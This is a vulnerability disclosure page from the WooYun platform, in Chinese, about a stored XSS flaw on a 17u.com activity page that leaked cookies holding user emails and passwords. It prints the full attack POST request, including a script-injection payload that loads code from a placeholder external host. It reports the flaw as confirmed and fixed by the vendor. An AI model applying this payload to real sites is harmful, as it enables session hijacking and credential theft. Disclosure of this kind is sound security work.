当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091777

漏洞标题:同程某处XSS,成功获取cookie(包含用户邮箱及密码)

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: sex is not show

提交时间:2015-01-14 11:04

修复时间:2015-02-01 12:45

公开时间:2015-02-01 12:45

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:12

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-14: 细节已通知厂商并且等待厂商处理中
2015-01-14: 厂商已经确认,细节仅向厂商公开
2015-01-24: 细节向核心白帽子及相关领域专家公开
2015-02-01: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

漏洞存在于http://www.17u.com/activity/17u-shajiabang/blogUpload.aspx
登录后在活动结束后仍然可以发布参赛作品,可以欺骗用户或管理员来登录,可成功获取cookie,cookie中带有登录的邮箱及密码
发布作品的post包:

POST /activity/17u-admin/COMModel/actionfun/form_upload_blog_action.aspx?_tid=39 HTTP/1.1
Host: www.17u.com
Proxy-Connection: keep-alive
Content-Length: 159
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.17u.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.17u.com/activity/17u-shajiabang/blogUpload.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: testcookie=yes; ASPSESSIONIDAQRRSDAB=KCIJIGEDLOBKODIJOFLFIAKD; BIGipServerwww-17u-com-pool=2130841772.8451.0000; BIGipServercommvc-pool=2583826604.8707.0000; bdshare_firstime=1420202090700; SourceUrl=url=http%3a%2f%2fwww.17u.com%2fhotel%2f; ASP.NET_SessionId=s4lekwivrm5ds5yctsv3cpid; BIGipServercom-activity-pool=3959597248.8451.0000; ASPSESSIONIDASQQTABA=JEFFJNEDJMOBGCKFAIAKDMAD; testcookie=yes; B2cCnMemberAutoStat=yes; Hm_lvt_986b306b86a73dcdd6bba6241561cbae=1420202129,1420202154,1420202262,1420202301; Hm_lpvt_986b306b86a73dcdd6bba6241561cbae=1420206920; autologintocn=Y; COMSEInfo=RefId=6158806&SEFrom=&SEKeyWords=&RefUrl=https%3A%2F%2Fwww.sssis.com%2F; B2cCnMemberLogStat=userid=49757182&nickName=lkjklkjl&token=180131051238040189120112112030181189091012185184176015018113043215061206097186229171025011200228020023109048101041176039000135067116108073182157203252061193066187005003097076053234240126158253184206045252193064000162; b2c%5Fcn%5Fmember%5Finfo=cityhomepageId=224&truename=15240233761&userArea=3106%2C1%2C0%2C0%2C0&user%5Fscore=101; has_js=1; __tctmc=55197035.153955134; __tctmd=55197035.737325; __tctma=55197035.1419732838194351.1420201974883.1420201974883.1420204486800.2; __tctmb=55197035.3073099855560704.1420206870433.1420207060972.15; __tctmu=55197035.0.0; __tctmz=55197035.1420204486800.2.5.utmccn=(referral)|utmcsr=sssis.com|utmcct=|utmcmd=referral; longKey=1419732838194351
txtTitle=asdsadas&txtImageUrl="此处为xss代码&txt_Content=</script/</textarea/"'><script/src=//xxxx></script/1&txtvalidCode=22


用户在http://www.17u.com/activity/17u-shajiabang/活动登录即可,已经成功打到17u.com的内部用户:

1.jpg


cookie中带有用户名密码信息:

1.jpg


已经成功登录:

1.jpg


漏洞证明:

1.jpg

修复方案:

你们懂的

版权声明:转载请注明来源 sex is not show@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-14 11:24

厂商回复:

感谢关注同程旅游,上次rank给少了,这次补上点。
今天会清理下这类过期的孤岛页面。
ps:cookie里看到楼主用的这个谷歌搜索镜像还不错 https://

最新状态:

2015-02-01:公开


漏洞评价:

评论

  1. 2015-01-14 11:09 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    前排围观

  2. 2015-01-14 11:26 | 苏州同程旅游网络科技有限公司(乌云厂商)

    url被吃掉了 评论里试下https://www.sssis.com/

  3. 2015-01-14 11:57 | sex is not show 认证白帽子 ( 普通白帽子 | Rank:1495 漏洞数:233 | 这家伙真懒!)

    小厂商简直要人命~ 得到2rank

  4. 2015-01-14 13:00 | 苏州同程旅游网络科技有限公司(乌云厂商)

    @sex is not show 没事儿,礼品卡补给你,哈。

  5. 2015-01-14 13:15 | sex is not show 认证白帽子 ( 普通白帽子 | Rank:1495 漏洞数:233 | 这家伙真懒!)

    @苏州同程旅游网络科技有限公司 礼品卡已收到,感谢

  6. 2015-01-27 09:34 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    @苏州同程旅游网络科技有限公司 厂商为嘛这么好。。

  7. 2015-02-01 09:15 | 果冻好吃 ( 路人 | Rank:22 漏洞数:11 | 大学通知书下来那天,我迫不及待的用四百块...)

    @苏州同程旅游网络科技有限公司 我要是妹子就嫁给你

  8. 2015-03-04 16:15 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

    @苏州同程旅游网络科技有限公司 你不造对帽子们这么好会让他们对你们发动强烈攻击的么